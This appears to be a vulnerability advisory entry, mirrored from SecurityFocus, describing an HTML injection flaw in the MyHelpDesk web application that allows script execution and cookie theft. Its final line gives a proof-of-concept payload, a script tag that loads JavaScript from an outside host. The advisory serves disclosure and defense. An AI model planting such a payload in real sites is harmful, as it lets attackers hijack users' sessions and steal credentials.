9 lines
No EOL
697 B
Text
Executable file
9 lines
No EOL
697 B
Text
Executable file
source: http://www.securityfocus.com/bid/4967/info
|
|
|
|
It has been reported that MyHelpDesk is vulnerable to HTML injection attacks.
|
|
|
|
MyHelpDesk does not properly sanitize HTML tags from form fields. Attackers may pass arbitrary HTML and script code through the unsanitized form fields or through parameters specified via URL. The attacker-supplied HTML code will be executed by the web client of users who visit such pages, in the security context of the site running the vulnerable software.
|
|
|
|
This may potentially be exploited to hijack web content or steal cookie-based authentication credentials from legitimate users.
|
|
|
|
<script src="http://forum.olympos.org/f.js">Alper</script> |